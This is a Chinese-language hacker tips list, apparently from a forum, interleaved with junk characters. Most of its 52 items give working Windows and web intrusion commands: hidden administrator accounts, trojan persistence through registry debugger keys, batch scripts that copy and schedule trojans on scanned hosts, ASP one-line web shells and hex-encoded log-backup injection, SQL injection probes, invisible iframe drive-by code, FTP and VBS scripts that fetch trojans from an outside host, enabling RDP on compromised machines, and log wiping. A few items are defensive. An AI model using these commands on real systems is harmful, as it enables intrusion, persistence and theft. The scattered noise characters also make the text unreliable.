Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
7 u7 |0 R. b5 u4 Qcacls C:\windows\system32 /G hqw20:R
6 H4 {5 N- h" L& ] W思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' r% T4 o9 C" i6 ]& \0 v恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- o9 k" ?5 h, k" I# ]4 E( g+ h( K2 z
q5 P; I f7 S, K0 Q9 P
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
2 Q4 k* r; q. c( x
4 R: r) Q2 S p9 |3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
4 b+ Q! @; V% X
1 w' @) L) n* G, z- Z) `4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- k5 K9 y, r; E6 }( s: {. X3 N$ U0 s4 ? ^; W. {
5、利用INF文件来修改注册表, h& F- s+ X$ O& l; G
[Version]4 N" D8 m5 u4 r6 J$ r
Signature="$CHICAGO$"
9 u7 s# d+ q: L[Defaultinstall]3 K# G W# X% \3 {- ~! k
addREG=Ating
: n S/ w* }: C& M3 \: E" Z[Ating]
% i3 g5 [5 f. Z4 sHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"0 {; Q$ N. ?: b1 W F1 V3 ^& d; g3 A
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:) B3 B# H) ?+ M- L, X: O1 I/ ?
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径. M, J9 o' y* P7 [9 t
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 Q) _ k- j. U* [
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
/ c' G; a# r: p5 U5 ~! HHKEY_CURRENT_CONFIG 简写为 HKCC- M8 m9 q* I$ A+ Q( G7 G
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, v. Z4 N& e- N6 M$ V: u( k
"1"这里代表是写入或删除注册表键值中的具体数据' p! q- j. J/ J* a
5 l& [" |4 {* e4 Z8 x
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
W& `+ ?% I8 i+ d$ ]多了一步就是在防火墙里添加个端口,然后导出其键值. G1 u. r% X" D3 c# M
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]% _' N3 s# ^; X: c2 b j9 \5 z
# w i* a$ t/ w
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽: J& n6 R3 ~( Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" S0 [& N$ |9 |' c6 b
) e2 t" k2 E0 ^$ x% Q8 L8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 p& j; X* R. P5 s8 z* |/ `% N
% N" z3 p) v8 m$ g
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
& z d- M' Q+ p% x; i1 F8 U/ C+ s可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( {! o. r! f7 s# ~! f# U2 l
3 E' S3 j) R- {: B) U10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”9 h4 c+ N8 S l; x: F# }
0 i7 C; \) O O( \/ R; `* {11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,2 m% P* V) i$ b( V2 x- J. {
用法:xsniff –pass –hide –log pass.txt
& X4 D [ n( b! n% _. A. H* s: \
7 T1 t0 ?% Q% K% y12、google搜索的艺术9 b' V- o0 Y [, r5 Q) B" L
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”7 u3 x7 p+ N2 J9 o
或“字符串的语法错误”可以找到很多sql注入漏洞。6 p% o+ C1 Z4 q2 T8 g5 l0 @9 A
1 L& m2 @. c6 p- u13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。( q# [: R1 V( U5 {! b
+ ^4 o7 x8 K" ?" B# M14、cmd中输入 nc –vv –l –p 1987" _! T0 y) x* H8 ]
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
4 s6 R/ a# |8 H! f; z) w/ |
: c k( W( @0 R7 N- l" k15、制作T++木马,先写个ating.hta文件,内容为8 A; J; C3 U- D. ?/ i! f
<script language="VBScript">
+ ?# d' l s6 w0 D6 _- Y9 r: ^set wshshell=createobject ("wscript.shell" )
! w5 W2 }7 f& w! v+ b. d$ z0 b0 [a=wshshell.run("你马的名称",1), @' ]8 k8 G: B3 y2 | M1 e
window.close8 j0 K& B9 M/ Q; `, x4 @1 @6 H1 R
</script>, B3 u! ^. A6 c0 \) V9 j
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
& i( y) p7 R1 g) Z4 \$ B7 I
( N `* p$ N$ m1 B16、搜索栏里输入
2 ~% n# o1 Q* u) x/ `关键字%'and 1=1 and '%'='8 p, e u6 j- l! [, S L
关键字%'and 1=2 and '%'='
# @& S! `6 S) \) @比较不同处 可以作为注入的特征字符
* j$ }6 M$ m4 h9 L: X ? j' b3 t7 Q* t- Y$ ~
17、挂马代码<html>
$ L$ I) M" D$ J' {- }7 T<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! I6 V4 i/ j+ D, T+ e, `4 N</html>
4 t0 ]2 \5 [" ?! }; j$ i/ b3 E" _% ^( `/ u' B& t7 c
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
4 C3 ]8 e. y* S! wnet localgroup administrators还是可以看出Guest是管理员来。
3 e( F7 W8 |: n( Y' e, N* X C
4 x% u. {( F3 U1 N. J& o7 {. Z4 P19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等8 ]& X) E( M' Z$ J- l- |
用法: 安装: instsrv.exe 服务名称 路径
, V3 T3 w( e9 L- I& B3 ]) f卸载: instsrv.exe 服务名称 REMOVE
1 U' }( n, B0 a) f0 l: U
8 M! \3 H0 g3 |0 \3 [- t2 n9 D
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉5 R$ ], d5 l8 S8 G$ l a3 Q2 V
不能注入时要第一时间想到%5c暴库。2 G# H* Y$ o O$ a: n
9 R8 I; `% ]7 D
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~+ G1 R2 ?. V) `+ M8 N2 k! {
& v7 d7 G( J/ i
23、缺少xp_cmdshell时/ W6 D+ d) k9 ~: e3 s# M/ w
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 e0 }$ v) H4 Q9 |( Q e8 m假如恢复不成功,可以尝试直接加用户(针对开3389的)% Q: k# A% O/ s0 g
declare @o int$ c2 X& ^& D. Z! `. r, p. ~5 P# T
exec sp_oacreate 'wscript.shell',@o out% V; j# B( n- u. K$ ]
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员9 z/ a# |5 b7 u0 O2 v& [' w; K" \: U
( U9 o/ m, C8 d L, T
24.批量种植木马.bat
* a+ Y; h+ p8 h. i% Jfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
" N4 Q# p3 L& P- t9 ?6 I4 X3 C- gfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
# e5 j* z" t8 ^$ r) |扫描地址.txt里每个主机名一行 用\\开头! L$ M' I; ?" n( j4 b" m+ m
% S" ~( R& w ]7 C6 C$ s
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。! {$ Z0 S# Q$ c. Q4 ^8 B- U ^
e7 v( [; k6 @4 p/ [26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.) u9 [* o" y0 Z, V" o0 W
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.* O4 r+ W: a) _8 j8 @3 a
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% I; o3 g+ k8 A. n; h0 I, a" t, w# ^* s9 Q" Z8 O
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
7 t G% p3 R8 T( g+ y3 C. S N然后用#clear logg和#clear line vty *删除日志+ L1 V& n8 x8 ]: a. Y- D- @" v
6 `/ J- l- Z9 X0 \( j1 s" p
28、电脑坏了省去重新安装系统的方法
' ^) r% ]6 v; `' l. f) B8 V, ]; M纯dos下执行,
: X3 C8 V7 `" v4 Lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config# ?# n% C& h8 [, R/ A9 g% @ L
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
/ J7 i x# t& X) O9 D( l7 m
v; ~5 k+ Q) K5 z29、解决TCP/IP筛选 在注册表里有三处,分别是:
! A* J, K1 A, J; G! xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 ~: J) U) u) B w7 w* u) ~/ O, hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 N# Z! Y( D3 f p/ a7 g! j0 x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
z8 o1 t9 S3 R) h分别用
7 t) G m* V1 M& c2 p7 u- e6 _& _regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" C0 A q$ [, v8 T- f; l. fregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! T) {9 L; O: M6 ^( I6 g; m' Qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* b5 s1 @# y; `4 H命令来导出注册表项
- O. E+ Y9 G: Z- r c* O( E! h然后把三个文件里的EnableSecurityFilters"=dword:00000001,
4 F; [( L0 s* o y9 A( O! p改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. [7 L$ k* ?$ J8 \regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
2 y. n, g" r; ^
/ i9 A% Y/ i3 @7 K, I6 U* r1 \30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U( e" e$ c$ P" j5 B6 g
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
$ i3 F# U/ G' X x/ u6 Y ~3 c' `
31、全手工打造开3389工具
& p; {$ u" V# X5 z6 I( R8 k5 g打开记事本,编辑内容如下:* ~4 z5 c, J% F5 h+ V
echo [Components] > c:\sql
3 r# {7 X- _3 q) _8 r' Hecho TSEnable = on >> c:\sql! T$ N' x9 R9 w) J& x# W* i" e
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q! R: y& E$ }$ i, ?% _
编辑好后存为BAT文件,上传至肉鸡,执行
* b0 T1 ~0 w$ H+ B$ \2 N# ?% L+ z' @, l& ~2 ^' w
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 I% N9 G/ Z& e6 b0 \: r
1 r' P& i+ u8 L0 Z33、让服务器重启
5 a8 I- m4 B: X) o% Q写个bat死循环:) C# T# F: L& L8 e
@echo off9 L6 X$ [, _: E, s
:loop1& |3 G7 o& |5 G8 e
cls1 J2 x# R8 |1 T$ m, i5 j
start cmd.exe" I1 h- Z* P7 Q# r, A0 ]
goto loop1 ` I$ T, d3 W8 @6 _$ v- |
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启9 O6 p2 c3 H9 s! F( e, r
3 F5 g8 H6 ?# Q% @( x34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- F; ]5 o M% l4 @7 W6 x, [3 s0 C8 H@echo off% Z1 I- w+ g$ w+ b: ~' j; ~
date /t >c:/3389.txt' R: t( O) S$ _3 C" g& ?
time /t >>c:/3389.txt
4 t+ f0 Z6 w2 @# z( n h: k! tattrib +s +h c:/3389.bat( {2 T3 P- f6 t% S/ {1 \
attrib +s +h c:/3389.txt8 y F2 ]9 Q2 c0 B- L- ]3 O5 ?
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
9 E6 H0 K/ L* c4 `6 u并保存为3389.bat
5 |# K' s+ z' y3 ^" S& `( M打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号& n- ]. S$ c4 O3 \' W
2 M) ]( J8 J$ I4 S7 w: m
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
0 ?7 _' e$ J; v! y; `, {( l3 @start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
5 v9 v3 n, z& q: J) a7 D3 U输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
* P3 O) f f1 f% L I9 |) ` x! H
( R6 S% d. M4 Q1 t36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: m7 |8 K7 K$ x+ z" O. Qecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
) ^, g7 X b. a$ qecho 你的FTP账号 >>c:\1.bat //输入账号
' }8 y! B, ~" Q, `$ Lecho 你的FTP密码 >>c:\1.bat //输入密码
# E b+ `+ @9 W; {/ s, J& y+ recho bin >>c:\1.bat //登入
5 Z: A8 ?' C& H' s% p9 Y0 ~echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么; x: b! S+ L! B
echo bye >>c:\1.bat //退出
1 Z2 _8 t/ v/ |- T: ?$ P' x# K然后执行ftp -s:c:\1.bat即可' r& N1 J4 d5 u( w: X8 S6 d: H
- s: T8 ?% H" F" K' F; o
37、修改注册表开3389两法
: `- H6 }6 F* \0 h9 O2 I(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( Q0 e3 a/ l0 c) Z! ?3 b: ]
echo Windows Registry Editor Version 5.00 >>3389.reg
& K1 G: {0 n/ q* e" g! U8 i7 G8 kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
. E$ q/ m8 ~5 Y6 wecho "Enabled"="0" >>3389.reg
8 B- x% R! ^4 eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& M! V0 z, w$ \# W6 o4 f2 cNT\CurrentVersion\Winlogon] >>3389.reg, l- g/ N# s5 l+ T
echo "ShutdownWithoutLogon"="0" >>3389.reg
. O2 d! w8 @! {/ n1 ^$ H7 techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 @% l" I' C2 E( Y% \& F7 K>>3389.reg
' r2 r: x3 }; w- {. Becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% `+ B0 x: y! i8 b+ Y- E* ^% Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 D0 M# n) f3 n
>>3389.reg
# ?0 V, o1 ` n3 v/ \7 }echo "TSEnabled"=dword:00000001 >>3389.reg
; R& Y$ m0 T+ f. Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg$ _0 E' [- Q4 @# _* F5 V, P
echo "Start"=dword:00000002 >>3389.reg4 E o/ I* h! L2 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 `+ ^% m% l l$ p3 ?>>3389.reg
: F9 u; `0 {" ]5 h, cecho "Start"=dword:00000002 >>3389.reg3 E8 L4 b* O8 n
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg! ^! N4 Y( [) o( a
echo "Hotkey"="1" >>3389.reg
+ b6 b8 ~: l: g1 n5 F) T9 ~# q, Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 w( o9 Q" R7 ~& j- v/ jServer\Wds\rdpwd\Tds\tcp] >>3389.reg3 s3 i1 W% U) m6 ^! c: G; n
echo "PortNumber"=dword:00000D3D >>3389.reg
0 r) s7 [0 \" U6 r" Q6 Z$ }# Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 k; A3 j# k/ JServer\WinStations\RDP-Tcp] >>3389.reg
0 X7 e* ]& Q3 I: ~' cecho "PortNumber"=dword:00000D3D >>3389.reg$ ?- Z Z( d* X$ p$ i5 r: T0 ]
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。1 y# P2 E# x7 t h, `& e5 i
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
) L. O) C7 _* u/ w! i因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效6 @" W7 }4 z3 s1 R% G
(2)winxp和win2003终端开启2 T1 n" V' j5 ~% F$ B& P4 K
用以下ECHO代码写一个REG文件:' S% ] t- m( o0 V S
echo Windows Registry Editor Version 5.00>>3389.reg
P# v2 [' K; ?1 ~/ w: X" t5 h' E% Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) U, `+ K8 S8 i, j$ U) d' V
Server]>>3389.reg& B1 _ T1 d8 X9 x" S$ }* L6 j
echo "fDenyTSConnections"=dword:00000000>>3389.reg' Y l I' a/ h5 T, R3 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 V! u8 T# B' C& w5 V7 gServer\Wds\rdpwd\Tds\tcp]>>3389.reg
+ m4 a; i3 G/ a8 e' y9 Q* zecho "PortNumber"=dword:00000d3d>>3389.reg. y' v' }8 I1 \( D& ]! o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& b! i. a x8 n! o, EServer\WinStations\RDP-Tcp]>>3389.reg
8 W6 F; a! W' Z$ h7 G+ l5 }echo "PortNumber"=dword:00000d3d>>3389.reg
& h; J; m* n+ q然后regedit /s 3389.reg del 3389.reg! v v6 x, d; d6 z) w
XP下不论开终端还是改终端端口都不需重启. b- U& q$ A1 d
" Y7 z+ }# d. Y38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
$ S5 W+ r' T* v8 ], t2 y2 u用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'- Y/ y1 V; U- O& b- i# y
2 g6 S) I* @/ C' j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
+ i4 |; m7 B- f* J(1)数据库文件名应复杂并要有特殊字符
! C+ c1 L. p; d9 g5 G4 d(2)不要把数据库名称写在conn.asp里,要用ODBC数据源- [; H& r: V' p. X6 B
将conn.asp文档中的) B3 p6 ^, A+ [& u, K. |# L
DBPath = Server.MapPath("数据库.mdb")( |! N( G, `5 A$ o. v$ l
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath0 G6 k3 @2 \ _* G8 v# }- O
. Q% C$ D7 _6 s: F; S
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
! ~( |: ^, h7 H4 d. i% m(3)不放在WEB目录里
, S9 V2 j& f* Y5 q! M: R3 F
& J$ Q6 W) `& G y, U8 r4 q40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
3 y$ a- F% T. x( |! z5 a% Q可以写两个bat文件
2 e- I7 A" f! I7 g" _ D5 T" c3 a@echo off+ E5 k, D5 L- }1 }! Y( u
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe0 @: P/ S& _+ R
@del c:\winnt\system32\query.exe
7 u: U8 E6 W& H0 l+ |@del %SYSTEMROOT%\system32\dllcache\query.exe
3 e- W( L0 j0 A" H" o" N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的. O& ?. o! N. }, b9 g! G+ u; Q7 l7 q; Q
5 @( l5 T e- j# }8 D9 }% v7 t1 _" ^
@echo off% ~- Q9 {1 z4 G8 H5 y1 p" [7 x
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe0 d% c! X; r0 j
@del c:\winnt\system32\tsadmin.exe
) Q# A* J$ V( S: e9 A' h+ J- A' N3 H# J@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ A; h K2 y: Z: p
0 ~+ G* O' m" {, l5 z! j41、映射对方盘符
" ^+ z/ V( s- l( E. I# d5 v) Ptelnet到他的机器上,
+ y* G" `4 V: [% ]net share 查看有没有默认共享 如果没有,那么就接着运行
- l6 \( r7 V: [net share c$=c:
/ G. }: a3 J# @8 p1 }" Lnet share现在有c$
1 v* g* d" W7 K. N/ ?在自己的机器上运行" B. }4 p) D" Q a
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, \# o1 s, Q% T9 M7 }! }
/ z e- V" |3 X; T
42、一些很有用的老知识' |! w; Q8 s' U& i9 L+ \, a
type c:\boot.ini ( 查看系统版本 )
/ S) W$ w" k: X& fnet start (查看已经启动的服务)3 P, j, W ^) B
query user ( 查看当前终端连接 )
+ T- m2 ?1 w1 r- cnet user ( 查看当前用户 )
8 j2 b8 H0 A& A* Y( {. g$ }net user 用户 密码/add ( 建立账号 )
- I; y" C0 r& x+ _$ d" H1 Nnet localgroup administrators 用户 /add (提升某用户为管理员)
* n; h/ K" C6 l) i5 ~6 ?ipconfig -all ( 查看IP什么的 )8 k* p, F: \6 A6 u- s+ i
netstat -an ( 查看当前网络状态 )
) v y( b0 h5 \1 ] N) ?findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)3 p; j6 F5 h# s& q; G6 F9 _
克隆时Administrator对应1F43 e- R4 N6 K; q) l! J
guest对应1F5, r- s8 r8 D6 `' O
tsinternetuser对应3E8
: L) f/ Q8 E7 W0 s3 z; c- l( e1 j- a1 W. K" ~0 y
43、如果对方没开3389,但是装了Remote Administrator Service, `/ c$ h. N- j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
/ x# Q0 ~5 w9 h5 J# C+ ^! n解释:用serv-u漏洞导入自己配制好的radmin的注册表信息( n4 P. w5 s+ L1 K% k' P
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 Q& a. Z; I8 ]0 B% ?
! u8 n" {" r9 ]+ a6 k, g44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)6 G: Q% H% h7 V* r* @
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)2 I$ p1 V% n: f. e& u
1 M# C3 ^1 w- F9 k0 L45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 I3 `$ }( b4 u1 {& F( g& P* a
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
( p( i! H( t0 e# y" N7 |0 D: B^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =- ~6 \# D, I# @& _6 p5 M1 g+ S
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =4 U5 r" v8 q+ q& p/ q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 Y2 @4 ~8 G6 \) k(这是完整的一句话,其中没有换行符)
( w' ^7 P0 G6 H6 ^" _+ y# ^( p然后下载:8 N O. Q" r9 M
cscript down.vbs http://www.hack520.org/hack.exe hack.exe2 ^) \. e/ C. y( S5 V% X
- `+ ?3 Y4 ?7 d46、一句话木马成功依赖于两个条件:
2 v O3 b( \/ s8 \2 w3 N+ A! p1、服务端没有禁止adodb.Stream或FSO组件 b8 ?8 y6 j% S: G6 N& P9 Y
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。+ S" \8 i3 h3 Z, [& L2 o$ R, \
, I2 t3 m G, j47、利用DB_OWNER权限进行手工备份一句话木马的代码:
# z! m7 ?0 p( {: W) `;alter database utsz set RECOVERY FULL--
_: u" G: y# l/ w; C: h5 S;create table cmd (a image)--$ h5 p' ?- s5 y( R
;backup log utsz to disk = 'D:\cmd' with init--
3 p/ N& Q9 v# U" v;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--% e+ _) a0 e' v, L
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--% p9 ]' r1 U9 _. {6 E. H1 `! E
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" Z2 H6 `6 J' R2 ^( f: F, z: b0 B2 ]
Z4 G( x! ]/ g' B) V48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
/ g/ T2 i6 I+ s0 e
' T1 ?: N1 K/ l% Z7 J/ Z1 p用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 w! k) M. H3 [; d$ i! ^9 ?" T G ?' k
所有会话用 'all'。
* M* D- X$ k f1 S/ I, f9 x-s sessionid 列出会话的信息。
. u3 ]- m) ]" W/ d- W-k sessionid 终止会话。
. v$ C! d; S9 p-m sessionid 发送消息到会话。
3 x9 O6 m- `( {" L
- L* w, z" V: Pconfig 配置 telnet 服务器参数。/ S6 V7 |1 V0 v
9 e( F$ S" K# V0 k
common_options 为:
/ f4 P3 n, V) k% ~( h" ?! r-u user 指定要使用其凭据的用户, j. U- Z9 q' d. `" W% k( Y
-p password 用户密码6 \6 F& m8 @( \ p
0 \# c$ F8 j5 @+ L# z: H7 |
config_options 为:
: J8 V) Y( q0 H: t+ Adom = domain 设定用户的默认域( \6 A* K- {8 ?) h
ctrlakeymap = yes|no 设定 ALT 键的映射
. T; @& W2 D4 o0 }( Mtimeout = hh:mm:ss 设定空闲会话超时值
5 E, e9 u2 p6 z/ h7 Dtimeoutactive = yes|no 启用空闲会话。( L" K- w* |# y0 @8 a$ P) r( V
maxfail = attempts 设定断开前失败的登录企图数。, O" R0 f( o9 [8 {+ `' k
maxconn = connections 设定最大连接数。
1 y4 l# h+ E* qport = number 设定 telnet 端口。4 B# ~& X0 V9 f/ T
sec = [+/-]NTLM [+/-]passwd/ H' Z( w, R6 X; a' d8 e
设定身份验证机构2 ?* f" O3 A# [& J; z# U3 L: g
fname = file 指定审计文件名。
% |1 i. [6 p7 H; ~* Afsize = size 指定审计文件的最大尺寸(MB)。
, f) i& q7 l1 f+ C! Q. ]5 G* j7 Qmode = console|stream 指定操作模式。
8 i# z6 N% Q# y) E& r& Y) p9 j5 l% Yauditlocation = eventlog|file|both/ M }1 S( d6 p* h3 c/ p8 q
指定记录地点9 t' M( H' m, v: o0 {
audit = [+/-]user [+/-]fail [+/-]admin/ J7 i) ?- k+ }. a8 ^, |" R
# B2 a6 \0 b' c1 [$ \3 e8 K6 b49、例如:在IE上访问:+ a# X9 Y! M; {( x: N* M
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' F9 L( t6 f/ h4 `7 {# lhack.txt里面的代码是:
3 M& @2 m( _; J6 R, l<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
" U, p$ \6 h; I' Q6 a1 i把这个hack.txt发到你空间就可以了!
; \$ R! I) ~ y" e1 a0 ]1 E' o; [这个可以利用来做网马哦!
# m2 O1 G( h; R2 D/ D4 y2 r7 a" r, U* e
50、autorun的病毒可以通过手动限制!
, n2 D) G- j ^+ T* n% u: ^1 G4 P1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( P7 y: j0 [5 a C4 I* L2,打开盘符用右键打开!切忌双击盘符~
8 s- r& S* ^. r4 a# {1 V3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* p, q, U C: j3 q" H, U
5 H( }8 n0 h# q8 g51、log备份时的一句话木马:% R3 O6 \9 q t+ f( R5 c
a).<%%25Execute(request("go"))%%25>) z3 M8 {2 |6 G) ^" r+ t* f
b).<%Execute(request("go"))%>
: O% j. @$ z u$ E; F; {c).%><%execute request("go")%><%
( K6 S2 R! v5 Ud).<script language=VBScript runat=server>execute request("sb")</Script>
6 k1 U/ \+ N+ y7 m9 I% \- Le).<%25Execute(request("l"))%25>' L* W- t5 H# }: f
f).<%if request("cmd")<>"" then execute request("pass")%>2 y) {) d+ I$ H7 t
! S; X3 _# o; M- |7 S4 a52、at "12:17" /interactive cmd
